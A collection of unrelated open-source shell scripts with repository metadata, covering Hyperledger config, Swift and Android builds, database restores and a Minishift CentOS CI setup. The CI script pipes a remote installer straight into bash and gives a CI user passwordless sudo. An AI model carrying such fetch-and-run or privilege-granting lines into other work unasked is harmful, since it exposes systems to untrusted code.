# 2. The environment variable CORE_LOGGING_LEVEL otherwise applies to
# all peer commands if defined as a non-empty string.
#
# 3. The value of `level` that directly follows in this file.
#
# If no overall default level is provided via any of the above methods,
# the peer will default to INFO (the value of defaultLevel in
# common/flogging/logging.go)
# Default for all modules running within the scope of a peer.
# Note: this value is only used when --logging-level or CORE_LOGGING_LEVEL
# are not set
level: info
# The overall default values mentioned above can be overridden for the
# specific components listed in the override section below.
# Override levels for various peer modules. These levels will be
# applied once the peer has completely started. They are applied at this
# time in order to be sure every logger has been registered with the
# logging package.
# Note: the modules listed below are the only acceptable modules at this
# time.
cauthdsl: warning
gossip: warning
grpc: error
ledger: info
msp: warning
policies: warning
peer:
gossip: warning
# Message format for the peer logs
format: '%{color}%{time:2006-01-02 15:04:05.000 MST} [%{module}] %{shortfunc} -> %{level:.4s} %{id:03x}%{color:reset} %{message}'
###############################################################################
#
# Peer section
#
###############################################################################
peer:
# The Peer id is used for identifying this Peer instance.
id: jdoe
# The networkId allows for logical seperation of networks
networkId: dev
# The Address at local network interface this Peer will listen on.
# By default, it will listen on all network interfaces
listenAddress: 0.0.0.0:7051
# The endpoint this peer uses to listen for inbound chaincode connections.
# If this is commented-out, the listen address is selected to be
# the peer's address (see below) with port 7052
chaincodeListenAddress: 0.0.0.0:7052
# The endpoint the chaincode for this peer uses to connect to the peer.
# If this is not specified, the chaincodeListenAddress address is selected.
# And if chaincodeListenAddress is not specified, address is selected from
# peer listenAddress.
# chaincodeAddress: 0.0.0.0:7052
# When used as peer config, this represents the endpoint to other peers
# in the same organization. For peers in other organization, see
# gossip.externalEndpoint for more info.
# When used as CLI config, this means the peer's endpoint to interact with
address: 0.0.0.0:7051
# Whether the Peer should programmatically determine its address
# This case is useful for docker containers.
addressAutoDetect: false
# Setting for runtime.GOMAXPROCS(n). If n < 1, it does not change the
# current setting
gomaxprocs: -1
# Keepalive settings for peer server and clients
keepalive:
# MinInterval is the minimum permitted time between client pings.
# If clients send pings more frequently, the peer server will
# disconnect them
minInterval: 60s
# Client keepalive settings for communicating with other peer nodes
client:
# Interval is the time between pings to peer nodes. This must
# greater than or equal to the minInterval specified by peer
# nodes
interval: 60s
# Timeout is the duration the client waits for a response from
# peer nodes before closing the connection
timeout: 20s
# DeliveryClient keepalive settings for communication with ordering
# nodes.
deliveryClient:
# Interval is the time between pings to ordering nodes. This must
# greater than or equal to the minInterval specified by ordering
# nodes.
interval: 60s
# Timeout is the duration the client waits for a response from
# ordering nodes before closing the connection
timeout: 20s
# Gossip related configuration
gossip:
# Bootstrap set to initialize gossip with.
# This is a list of other peers that this peer reaches out to at startup.
# Important: The endpoints here have to be endpoints of peers in the same
# organization, because the peer would refuse connecting to these endpoints
# unless they are in the same organization as the peer.
bootstrap: 127.0.0.1:7051
# NOTE: orgLeader and useLeaderElection parameters are mutual exclusive.
# Setting both to true would result in the termination of the peer
# since this is undefined state. If the peers are configured with
# useLeaderElection=false, make sure there is at least 1 peer in the
# organization that its orgLeader is set to true.
# Defines whenever peer will initialize dynamic algorithm for
# "leader" selection, where leader is the peer to establish
# connection with ordering service and use delivery protocol
# to pull ledger blocks from ordering service. It is recommended to
# use leader election for large networks of peers.
useLeaderElection: true
# Statically defines peer to be an organization "leader",
# where this means that current peer will maintain connection
# with ordering service and disseminate block across peers in
# its own organization
orgLeader: false
# Overrides the endpoint that the peer publishes to peers
# in its organization. For peers in foreign organizations
# see 'externalEndpoint'
endpoint:
# Maximum count of blocks stored in memory
maxBlockCountToStore: 100
# Max time between consecutive message pushes(unit: millisecond)
maxPropagationBurstLatency: 10ms
# Max number of messages stored until a push is triggered to remote peers
maxPropagationBurstSize: 10
# Number of times a message is pushed to remote peers
propagateIterations: 1
# Number of peers selected to push messages to
propagatePeerNum: 3
# Determines frequency of pull phases(unit: second)
pullInterval: 4s
# Number of peers to pull from
pullPeerNum: 3
# Determines frequency of pulling state info messages from peers(unit: second)
requestStateInfoInterval: 4s
# Determines frequency of pushing state info messages to peers(unit: second)
publishStateInfoInterval: 4s
# Maximum time a stateInfo message is kept until expired
stateInfoRetentionInterval:
# Time from startup certificates are included in Alive messages(unit: second)
publishCertPeriod: 10s
# Should we skip verifying block messages or not (currently not in use)
skipBlockVerification: false
# Dial timeout(unit: second)
dialTimeout: 3s
# Connection timeout(unit: second)
connTimeout: 2s
# Buffer size of received messages
recvBuffSize: 20
# Buffer size of sending messages
sendBuffSize: 200
# Time to wait before pull engine processes incoming digests (unit: second)
digestWaitTime: 1s
# Time to wait before pull engine removes incoming nonce (unit: second)
requestWaitTime: 1s
# Time to wait before pull engine ends pull (unit: second)
responseWaitTime: 2s
# Alive check interval(unit: second)
aliveTimeInterval: 5s
# Alive expiration timeout(unit: second)
aliveExpirationTimeout: 25s
# Reconnect interval(unit: second)
reconnectInterval: 25s
# This is an endpoint that is published to peers outside of the organization.
# If this isn't set, the peer will not be known to other organizations.
externalEndpoint:
# Leader election service configuration
election:
# Longest time peer waits for stable membership during leader election startup (unit: second)
startupGracePeriod: 15s
# Interval gossip membership samples to check its stability (unit: second)
membershipSampleInterval: 1s
# Time passes since last declaration message before peer decides to perform leader election (unit: second)
leaderAliveThreshold: 10s
# Time between peer sends propose message and declares itself as a leader (sends declaration message) (unit: second)
leaderElectionDuration: 5s
pvtData:
# pullRetryThreshold determines the maximum duration of time private data corresponding for a given block
# would be attempted to be pulled from peers until the block would be committed without the private data
pullRetryThreshold: 60s
# As private data enters the transient store, it is associated with the peer's ledger's height at that time.
# transientstoreMaxBlockRetention defines the maximum difference between the current ledger's height upon commit,
# and the private data residing inside the transient store that is guaranteed not to be purged.
# Private data is purged from the transient store when blocks with sequences that are multiples
# of transientstoreMaxBlockRetention are committed.
transientstoreMaxBlockRetention: 1000
# pushAckTimeout is the maximum time to wait for an acknowledgement from each peer
# at private data push at endorsement time.
pushAckTimeout: 3s
# EventHub related configuration
events:
# The address that the Event service will be enabled on the peer
address: 0.0.0.0:7053
# total number of events that could be buffered without blocking send
buffersize: 100
# timeout duration for producer to send an event.
# if < 0, if buffer full, unblocks immediately and not send
# if 0, if buffer full, will block and guarantee the event will be sent out
# if > 0, if buffer full, blocks till timeout
timeout: 10ms
# timewindow is the acceptable difference between the peer's current
# time and the client's time as specified in a registration event
timewindow: 15m
# Keepalive settings for peer server and clients
keepalive:
# MinInterval is the minimum permitted time in seconds which clients
# can send keepalive pings. If clients send pings more frequently,
# the events server will disconnect them
minInterval: 60s
# TLS Settings
# Note that peer-chaincode connections through chaincodeListenAddress is
# not mutual TLS auth. See comments on chaincodeListenAddress for more info
tls:
# Require server-side TLS
enabled: false
# Require client certificates / mutual TLS.
# Note that clients that are not configured to use a certificate will
# fail to connect to the peer.
clientAuthRequired: false
# X.509 certificate used for TLS server
cert:
file: tls/server.crt
# Private key used for TLS server (and client if clientAuthEnabled
# is set to true
key:
file: tls/server.key
# Trusted root certificate chain for tls.cert
rootcert:
file: tls/ca.crt
# Set of root certificate authorities used to verify client certificates
clientRootCAs:
files:
- tls/ca.crt
# Private key used for TLS when making client connections. If
# not set, peer.tls.key.file will be used instead
clientKey:
file:
# X.509 certificate used for TLS when making client connections.
# If not set, peer.tls.cert.file will be used instead
clientCert:
file:
# Authentication contains configuration parameters related to authenticating
# client messages
authentication:
# the acceptable difference between the current server time and the
# client's time as specified in a client request message
timewindow: 15m
# Path on the file system where peer will store data (eg ledger). This
# location must be access control protected to prevent unintended
# modification that might corrupt the peer operations.
fileSystemPath: /var/hyperledger/production
# BCCSP (Blockchain crypto provider): Select which crypto implementation or
# library to use
BCCSP:
Default: SW
SW:
# TODO: The default Hash and Security level needs refactoring to be
# fully configurable. Changing these defaults requires coordination
# SHA2 is hardcoded in several places, not only BCCSP
Hash: SHA2
Security: 256
# Location of Key Store
FileKeyStore:
# If "", defaults to 'mspConfigPath'/keystore
# TODO: Ensure this is read with fabric/core/config.GetPath() once ready
KeyStore:
# Path on the file system where peer will find MSP local configurations
mspConfigPath: msp
# Identifier of the local MSP
# ----!!!!IMPORTANT!!!-!!!IMPORTANT!!!-!!!IMPORTANT!!!!----
# Deployers need to change the value of the localMspId string.
# In particular, the name of the local MSP ID of a peer needs
# to match the name of one of the MSPs in each of the channel
# that this peer is a member of. Otherwise this peer's messages
# will not be identified as valid by other nodes.
localMspId: DEFAULT
# Delivery service related config
deliveryclient:
# It sets the total time the delivery service may spend in reconnection
# attempts until its retry logic gives up and returns an error
reconnectTotalTimeThreshold: 3600s
# Type for the local MSP - by default it's of type bccsp
localMspType: bccsp
# Used with Go profiling tools only in none production environment. In
# production, it should be disabled (eg enabled: false)
profile:
enabled: false
listenAddress: 0.0.0.0:6060
# Handlers defines custom handlers that can filter and mutate
# objects passing within the peer, such as:
# Auth filter - reject or forward proposals from clients
# Decorators - append or mutate the chaincode input passed to the chaincode
# Valid handler definition contains:
# - A name which is a factory method name defined in
# core/handlers/library/library.go for statically compiled handlers
# - library path to shared object binary for pluggable filters
# Auth filters and decorators are chained and executed in the order that
# they are defined. For example:
# authFilters:
# -
# name: FilterOne
# library: /opt/lib/filter.so
# -
# name: FilterTwo
# decorators:
# -
# name: DecoratorOne
# -
# name: DecoratorTwo
# library: /opt/lib/decorator.so
handlers:
authFilters:
-
name: DefaultAuth
-
name: ExpirationCheck # This filter checks identity x509 certificate expiration
decorators:
-
name: DefaultDecorator
# Number of goroutines that will execute transaction validation in parallel.
# By default, the peer chooses the number of CPUs on the machine. Set this
# variable to override that choice.
# NOTE: overriding this value might negatively influence the performance of
# the peer so please change this value only if you know what you're doing
validatorPoolSize:
###############################################################################
#
# VM section
#
###############################################################################
vm:
# Endpoint of the vm management system. For docker can be one of the following in general
# unix:///var/run/docker.sock
# http://localhost:2375
# https://localhost:2376
endpoint: unix:///var/run/docker.sock
# settings for docker vms
docker:
tls:
enabled: false
ca:
file: docker/ca.crt
cert:
file: docker/tls.crt
key:
file: docker/tls.key
# Enables/disables the standard out/err from chaincode containers for
# debugging purposes
attachStdout: false
# Parameters on creating docker container.
# Container may be efficiently created using ipam & dns-server for cluster
# NetworkMode - sets the networking mode for the container. Supported
# standard values are: `host`(default),`bridge`,`ipvlan`,`none`.
# Dns - a list of DNS servers for the container to use.
# Note: `Privileged` `Binds` `Links` and `PortBindings` properties of
# Docker Host Config are not supported and will not be used if set.
# LogConfig - sets the logging driver (Type) and related options
# (Config) for Docker. For more info,
# https://docs.docker.com/engine/admin/logging/overview/
# Note: Set LogConfig using Environment Variables is not supported.
hostConfig:
NetworkMode: host
Dns:
# - 192.168.0.1
LogConfig:
Type: json-file
Config:
max-size: "50m"
max-file: "5"
Memory: 2147483648
###############################################################################
#
# Chaincode section
#
###############################################################################
chaincode:
# The id is used by the Chaincode stub to register the executing Chaincode
# ID with the Peer and is generally supplied through ENV variables
# the `path` form of ID is provided when installing the chaincode.
# The `name` is used for all other requests and can be any string.
id:
path:
name:
# Generic builder environment, suitable for most chaincode types
builder: $(DOCKER_NS)/fabric-ccenv:$(ARCH)-$(PROJECT_VERSION)
# Enables/disables force pulling of the base docker images (listed below)
# during user chaincode instantiation.
# Useful when using moving image tags (such as :latest)
pull: false
golang:
# golang will never need more than baseos
runtime: $(BASE_DOCKER_NS)/fabric-baseos:$(ARCH)-$(BASE_VERSION)
# whether or not golang chaincode should be linked dynamically
dynamicLink: false
car:
# car may need more facilities (JVM, etc) in the future as the catalog
# of platforms are expanded. For now, we can just use baseos
runtime: $(BASE_DOCKER_NS)/fabric-baseos:$(ARCH)-$(BASE_VERSION)
java:
# This is an image based on java:openjdk-8 with addition compiler
# tools added for java shim layer packaging.
# This image is packed with shim layer libraries that are necessary
# for Java chaincode runtime.
Dockerfile: |
from $(DOCKER_NS)/fabric-javaenv:$(ARCH)-$(PROJECT_VERSION)
node:
# need node.js engine at runtime, currently available in baseimage
# but not in baseos
runtime: $(BASE_DOCKER_NS)/fabric-baseimage:$(ARCH)-$(BASE_VERSION)
# Timeout duration for starting up a container and waiting for Register
# to come through. 1sec should be plenty for chaincode unit tests
startuptimeout: 300s
# Timeout duration for Invoke and Init calls to prevent runaway.
# This timeout is used by all chaincodes in all the channels, including
# system chaincodes.
# Note that during Invoke, if the image is not available (e.g. being
# cleaned up when in development environment), the peer will automatically
# build the image, which might take more time. In production environment,
# the chaincode image is unlikely to be deleted, so the timeout could be
# reduced accordingly.
executetimeout: 30s
# There are 2 modes: "dev" and "net".
# In dev mode, user runs the chaincode after starting peer from
# command line on local machine.
# In net mode, peer will run chaincode in a docker container.
mode: net
# keepalive in seconds. In situations where the communiction goes through a
# proxy that does not support keep-alive, this parameter will maintain connection
# between peer and chaincode.
# A value <= 0 turns keepalive off
keepalive: 0
# system chaincodes whitelist. To add system chaincode "myscc" to the
# whitelist, add "myscc: enable" to the list below, and register in
# chaincode/importsysccs.go
system:
cscc: enable
lscc: enable
escc: enable
vscc: enable
qscc: enable
# System chaincode plugins: in addition to being imported and compiled
# into fabric through core/chaincode/importsysccs.go, system chaincodes
# can also be loaded as shared objects compiled as Go plugins.
# See examples/plugins/scc for an example.
# Like regular system chaincodes, plugins must also be white listed in the
# chaincode.system section above.
systemPlugins:
# example configuration:
# - enabled: true
# name: myscc
# path: /opt/lib/myscc.so
# invokableExternal: true
# invokableCC2CC: true
# Logging section for the chaincode container
logging:
# Default level for all loggers within the chaincode container
level: info
# Override default level for the 'shim' module
shim: warning
# Format for the chaincode container logs
format: '%{color}%{time:2006-01-02 15:04:05.000 MST} [%{module}] %{shortfunc} -> %{level:.4s} %{id:03x}%{color:reset} %{message}'
###############################################################################
#
# Ledger section - ledger configuration encompases both the blockchain
# and the state
#
###############################################################################
ledger:
blockchain:
state:
# stateDatabase - options are "goleveldb", "CouchDB"
# goleveldb - default state database stored in goleveldb.
# CouchDB - store state database in CouchDB
stateDatabase: goleveldb
couchDBConfig:
# It is recommended to run CouchDB on the same server as the peer, and
# not map the CouchDB container port to a server port in docker-compose.
# Otherwise proper security must be provided on the connection between
# CouchDB client (on the peer) and server.
couchDBAddress: 127.0.0.1:5984
# This username must have read and write authority on CouchDB
username:
# The password is recommended to pass as an environment variable
# during start up (eg LEDGER_COUCHDBCONFIG_PASSWORD).
# If it is stored here, the file must be access control protected
# to prevent unintended users from discovering the password.
password:
# Number of retries for CouchDB errors
maxRetries: 3
# Number of retries for CouchDB errors during peer startup
maxRetriesOnStartup: 10
# CouchDB request timeout (unit: duration, e.g. 20s)
requestTimeout: 35s
# Limit on the number of records to return per query
queryLimit: 10000
# Limit on the number of records per CouchDB bulk update batch
maxBatchUpdateSize: 1000
# Warm indexes after every N blocks.
# This option warms any indexes that have been
# deployed to CouchDB after every N blocks.
# A value of 1 will warm indexes after every block commit,
# to ensure fast selector queries.
# Increasing the value may improve write efficiency of peer and CouchDB,
# but may degrade query response time.
warmIndexesAfterNBlocks: 1
history:
# enableHistoryDatabase - options are true or false
# Indicates if the history of key updates should be stored.
# All history 'index' will be stored in goleveldb, regardless if using
# CouchDB or alternate database for the state.
enableHistoryDatabase: true
###############################################################################
#
# Metrics section
#
#
###############################################################################
metrics:
# enable or disable metrics server
enabled: false
# when enable metrics server, must specific metrics reporter type
# currently supported type: "statsd","prom"
reporter: statsd
# determines frequency of report metrics(unit: second)
interval: 1s
statsdReporter:
# statsd server address to connect
address: 0.0.0.0:8125
# determines frequency of push metrics to statsd server(unit: second)
flushInterval: 2s
# max size bytes for each push metrics request
# intranet recommend 1432 and internet recommend 512
flushBytes: 1432
promReporter:
# prometheus http server listen address for pull metrics
listenAddress: 0.0.0.0:8080
EOF
}
main $1
|
jcs47/hyperledger-bftsmart
|
docker_images/create-docker-images.sh
|
Shell
|
apache-2.0
| 63,298 |
#!/usr/bin/env bash
# Copyright 2020 The Knative Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -o errexit
set -o nounset
set -o pipefail
SCRIPT_ROOT=$(dirname "${BASH_SOURCE[0]}")/..
# Make sure our dependencies are up-to-date
${SCRIPT_ROOT}/hack/update-deps.sh
|
knative-sandbox/kn-plugin-admin
|
hack/update-codegen.sh
|
Shell
|
apache-2.0
| 777 |
#! /usr/bin/env bash
# Copyright 2016 WePay, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
tar -C /usr/share/java/kafka-connect-bigquery/ -xf /usr/share/java/kafka-connect-bigquery/kcbq.tar
connect-standalone \
/etc/kafka-connect-bigquery/standalone.properties \
/etc/kafka-connect-bigquery/connector.properties &
sleep 60
kill $!
|
skyzyx/kafka-connect-bigquery
|
test/docker/connect/connect-docker.sh
|
Shell
|
apache-2.0
| 848 |
#!/bin/sh
ADB_COMMAND_PATH="adb"
ADB_FOUND=`${ADB_COMMAND_PATH} devices | tail -2 | head -1 | cut -f 1 | sed 's/ *$//g'`
DEVICES_NOT_PRESENT="List of devices attached"
SDCARD_FOLDER="/sdcard"
PATH_TO_APK_FILE=$1
if [ -f $PATH_TO_APK_FILE ];
then
echo "File $PATH_TO_APK_FILE exists."
if [[ ${ADB_FOUND} != ${NOT_PRESENT} ]]; then
FILE_NAME=$(basename $PATH_TO_APK_FILE)
APK_FILEPATH="$SDCARD_FOLDER/$FILE_NAME"
echo "Pushing $FILE_NAME to the device..."
${ADB_COMMAND_PATH} push $PATH_TO_APK_FILE $APK_FILEPATH
echo "Starting package installer..."
${ADB_COMMAND_PATH} shell am start -a "android.intent.action.VIEW" -t "application/vnd.android.package-archive" -d "file://$APK_FILEPATH"
echo "Done. Don't forget to delete file $FILE_NAME from $SDCARD_FOLDER after it is installed!"
else
echo "Android device seems to be missing. Exiting!"
fi
else
echo "File $PATH_TO_APK_FILE does not exist. Exiting!"
fi
|
zyrikby/ANDROID_TOOLS
|
run_pm_installer.sh
|
Shell
|
apache-2.0
| 947 |
#!/bin/bash
##
# Copyright IBM Corporation 2016,2018
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
# This script installs the Swift binaries. The following variable
# must be set for this script to work:
# SWIFT_SNAPSHOT - version of the Swift binaries to install.
# If any commands fail, we want the shell script to exit immediately.
set -e
# Echo commands before executing them.
#set -o verbose
echo ">> Running ${BASH_SOURCE[0]}"
# Suppress prompts of any kind while executing apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo -E apt-get -q update
sudo -E apt-get -y -q install clang lldb-3.8 libicu-dev libtool libcurl4-openssl-dev libbsd-dev build-essential libssl-dev uuid-dev tzdata libz-dev libblocksruntime-dev
echo ">> Installing '${SWIFT_SNAPSHOT}'..."
# Install Swift compiler
cd $projectFolder
wget --progress=dot:giga $SWIFT_SNAPSHOT
FILENAME=$(echo $SWIFT_SNAPSHOT | rev | cut -d/ -f1 | rev)
tar xzf $FILENAME
SWIFT_FOLDER=$(basename -s .tar.gz $FILENAME)
export PATH=$projectFolder/$SWIFT_FOLDER/usr/bin:$PATH
rm $FILENAME
|
IBM-Swift/Package-Builder
|
linux/install_swift_from_url.sh
|
Shell
|
apache-2.0
| 1,551 |
#!/bin/bash
cd `dirname $0`
. _project.sh
export answer=y
export DBFLUTE_ENVIRONMENT_TYPE=diffready
. replace-schema.sh
. jdbc.sh
export DBFLUTE_ENVIRONMENT_TYPE=diffworld
. replace-schema.sh
. jdbc.sh
. doc.sh
# call by native not to stop by failure
sh $DBFLUTE_HOME/etc/cmd/_df-manage.sh $MY_PROPERTIES_PATH schema-sync-check
sh $DBFLUTE_HOME/etc/cmd/_df-manage.sh $MY_PROPERTIES_PATH alter-check
unset DBFLUTE_ENVIRONMENT_TYPE
. manage.sh refresh
|
dbflute-test/dbflute-test-active-hanger
|
dbflute_maihamadb/diffworld-test.sh
|
Shell
|
apache-2.0
| 460 |
#!/bin/bash
# Copyright 2016 - 2022 Crunchy Data Solutions, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
CONTAINER_NAME=restore
echo "Cleaning up..."
sudo docker stop "${CONTAINER_NAME}"
sudo docker rm "${CONTAINER_NAME}"
docker volume rm full-restore-pgdata
echo "Starting the pg_basebackup full restore example..."
docker run \
--volume full-restore-pgdata:/pgdata \
--volume backup-volume:/backup:ro \
--env BACKUP_PATH=primary-backups/2020-02-08-21-07-31 \
--env PGDATA_PATH=pgbasebackup-full-restored \
--name="${CONTAINER_NAME}" \
--hostname="${CONTAINER_NAME}" \
--detach "${CCP_IMAGE_PREFIX}"/crunchy-pgbasebackup-restore:"${CCP_IMAGE_TAG}"
|
CrunchyData/crunchy-containers
|
examples/docker/pgbasebackup/full/run.sh
|
Shell
|
apache-2.0
| 1,219 |
#!/bin/bash
set -e
#########################################################################
#
# GUIDE TO USE OF THIS SCRIPT
#
#########################################################################
#
# - This script is used by npm run bundle in this probject and serves
# solely as an example
#
#########################################################################
if [ "$BASH_VERSION" = '' ]; then
echo " Please run this script via this command: './<Script Location>/<Script Name>.sh'"
exit 1;
fi
if [ -z "$1" ]; then
echo " Bad input: Expected a directory as the first argument for the path to put the final bundle files into (i.e. ./tagged-release)";
exit 1;
fi
# Copy over files that we want in the release
cp -r ./build/. $1
cp LICENSE $1
cp package.json $1
cp README.md $1
|
googlearchive/npm-publish-scripts
|
project/create-release-bundle.sh
|
Shell
|
apache-2.0
| 804 |
#!/bin/sh
exec scala "$0" "$@"
!#
object HelloWorld {
def main(args: Array[String]) {
println("Hello, " + args.toList)
}
}
HelloWorld.main(args)
|
tobyweston/learn-scala-java-devs
|
src/main/scala/s4j/scala/chapter02/hello.sh
|
Shell
|
apache-2.0
| 152 |
#!/bin/bash
set -x
set -e
if [ "$build_version" == "" ]; then
echo "Must set build_version environment variable"
exit 1
fi
if [ "$ANDROID_NDK_HOME" == "" ]; then
echo "Must set ANDROID_NDK_HOME environment variable"
exit 1
fi
rm -rf artifacts
mkdir artifacts
# compile braincloud
pushd ../solutions/android
"$ANDROID_NDK_HOME/ndk-build" clean
"$ANDROID_NDK_HOME/ndk-build"
popd
# and zip everything up
mkdir artifacts/brainCloud
mkdir -p artifacts/brainCloud/libs/armeabi
mkdir -p artifacts/brainCloud/libs/x86
cp ../lib/android/cocos-curl/libs/armeabi/*.a artifacts/brainCloud/libs/armeabi
cp ../lib/android/cocos-curl/libs/x86/*.a artifacts/brainCloud/libs/x86
mkdir -p artifacts/brainCloud/thirdparty/curl/include
cp -r ../lib/android/cocos-curl/include/curl artifacts/brainCloud/thirdparty/curl/include
cp -r ../lib/jsoncpp-1.0.0 artifacts/brainCloud/thirdparty
cp ../solutions/android/obj/local/armeabi/libbraincloud.a artifacts/brainCloud/libs/armeabi
cp ../solutions/android/obj/local/x86/libbraincloud.a artifacts/brainCloud/libs/x86
mkdir -p artifacts/brainCloud/include/braincloud
cp -r ../include/braincloud/* artifacts/brainCloud/include/braincloud
mkdir artifacts/brainCloud/javasrc
cp -r ../solutions/android/java/ artifacts/brainCloud/javasrc
cp docs/README.TXT artifacts/brainCloud
pushd artifacts/brainCloud
sed -i xxx "s/Platform: xxx/Platform: Android C++/g" README.TXT
sed -i xxx "s/Version: x.x.x/Version: ${build_version}/g" README.TXT
rm -f README.TXTxxx
popd
pushd artifacts
zip -r "brainCloudClient_Android_C++_${build_version}.zip" brainCloud
popd
|
getbraincloud/braincloud-cpp
|
autobuild/build_android.sh
|
Shell
|
apache-2.0
| 1,597 |
#!/bin/bash
# Copyright (C) 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Output command before executing
set -x
# Exit on error
set -e
# GitHub user
REPO_OWNER="minishift"
LATEST="latest"
# Source environment variables of the jenkins slave
# that might interest this worker.
function load_jenkins_vars() {
if [ -e "jenkins-env" ]; then
cat jenkins-env \
| grep -E "(JENKINS_URL|GIT_BRANCH|GIT_COMMIT|BUILD_NUMBER|ghprbSourceBranch|ghprbActualCommit|BUILD_URL|ghprbPullId|GH_TOKEN|CICO_API_KEY|API_TOKEN|JOB_NAME|RELEASE_VERSION|GITHUB_TOKEN|REPO|BRANCH)=" \
| sed 's/^/export /g' \
> ~/.jenkins-env
source ~/.jenkins-env
fi
echo 'CICO: Jenkins ENVs loaded'
}
function install_core_deps() {
# Install EPEL repo
yum -y install epel-release
# Get all the deps in
# We are installing golang from offical repository to make sure our downstream builds works as expected.
# CDK side golang always comes from the offical RHEL repository.
yum -y install gcc \
make \
tar \
zip \
git \
curl \
jq
echo 'CICO: Core dependencies installed'
}
function install_golang() {
# Install virt7-container-common-candidate to install latest golang package
# from the repo
cat > /etc/yum.repos.d/virt7-container-common-candidate.repo << EOF
[virt7-container-common-candidate]
name=virt7-container-common-candidate
baseurl=https://cbs.centos.org/repos/virt7-container-common-candidate/x86_64/os/
enabled=1
gpgcheck=0
EOF
yum -y install golang
echo 'CICO: Golang installed installed'
}
function install_kvm_virt() {
sudo yum -y install kvm \
qemu-kvm \
libvirt
# Start Libvirt
sudo systemctl start libvirtd
echo 'CICO: KVM hypervisor installed and started'
# Add minishift_ci to libvirt group
gpasswd -a minishift_ci libvirt && systemctl restart libvirtd
}
function install_docker() {
yum install -y docker
systemctl start docker
docker version
echo 'CICO: Docker installed and started'
# Add minishift_ci to docker group
groupadd docker && gpasswd -a minishift_ci docker && systemctl restart docker
}
# Create a docs user which has NOPASSWD sudoer role
function prepare_ci_user() {
# 1000 as id of user in docker image (https://github.com/minishift/minishift/blob/master/docs/Dockerfile#L25)
groupadd -g 1000 -r minishift_ci && useradd -g minishift_ci -u 1000 minishift_ci
chmod +w /etc/sudoers && echo "minishift_ci ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers && chmod -w /etc/sudoers
# Copy centos_ci.sh to newly created user home dir
cp centos_ci.sh /home/minishift_ci/
mkdir /home/minishift_ci/payload
# Copy minishift repo content into minishift_ci user payload directory for later use
cp -R . /home/minishift_ci/payload
chown -R minishift_ci:minishift_ci /home/minishift_ci/payload
# Copy the jenkins-env into minishift_ci home dir
cp ~/.jenkins-env /home/minishift_ci/jenkins-env
}
####### Below functions are executed by minishift_ci user
function setup_kvm_docker_machine_driver() {
curl -L https://github.com/dhiltgen/docker-machine-kvm/releases/download/v0.7.0/docker-machine-driver-kvm > docker-machine-driver-kvm && \
chmod +x docker-machine-driver-kvm && sudo mv docker-machine-driver-kvm /usr/local/bin/docker-machine-driver-kvm
echo 'CICO: Setup KVM docker-machine driver setup successfully'
}
function setup_golang() {
# Show which version of golang in the offical repo.
go version
# Setup GOPATH
mkdir $HOME/gopath $HOME/gopath/src $HOME/gopath/bin $HOME/gopath/pkg
export GOPATH=$HOME/gopath
export PATH=$GOROOT/bin:$GOPATH/bin:$PATH
}
function setup_repo() {
# Setup minishift repo
mkdir -p $GOPATH/src/github.com/minishift
cp -r /home/minishift_ci/payload $GOPATH/src/github.com/minishift/minishift
}
function setup_godep() {
GODEP_OS_ARCH=`go env GOHOSTOS`-`go env GOHOSTARCH`
GODEP_TAG=v0.4.1
GODEP_LATEST_RELEASE_URL="https://github.com/golang/dep/releases/download/${GODEP_TAG}/dep-${GODEP_OS_ARCH}"
mkdir /tmp/godep
curl -L ${GODEP_LATEST_RELEASE_URL} -o /tmp/godep/dep
chmod +x /tmp/godep/dep
export PATH=$PATH:/tmp/godep/
}
function prepare_repo() {
setup_golang;
setup_repo;
setup_godep;
echo "CICO: Preparation complete"
}
function install_docs_prerequisite_packages() {
# https://devops.profitbricks.com/tutorials/install-ruby-214-with-rvm-on-centos/
# Prerequisite packages
sudo yum install -y libyaml-devel \
readline-devel \
zlib-devel \
libffi-devel \
openssl-devel \
sqlite-devel \
java-1.7.0-openjdk-devel
# Install RVM
gpg2 --keyserver hkp://keys.gnupg.net --recv-keys D39DC0E3
curl -L get.rvm.io | bash -s stable
source ~/.profile
# Install Ruby
rvm install ruby-2.2.5
echo "CICO: RVM and Ruby Installed"
gem install ascii_binder -v 0.1.13
echo "CICO: Ascii Binder Installed"
}
########################################################
# Exit with message on failure of last executed command
# Arguments:
# $1 - Exit code of last executed command
# $2 - Error message
########################################################
function exit_on_failure() {
if [[ "$1" != 0 ]]; then
echo "$2"
exit 1
fi
}
function build_openshift_origin_docs() {
git clone https://github.com/openshift/openshift-docs
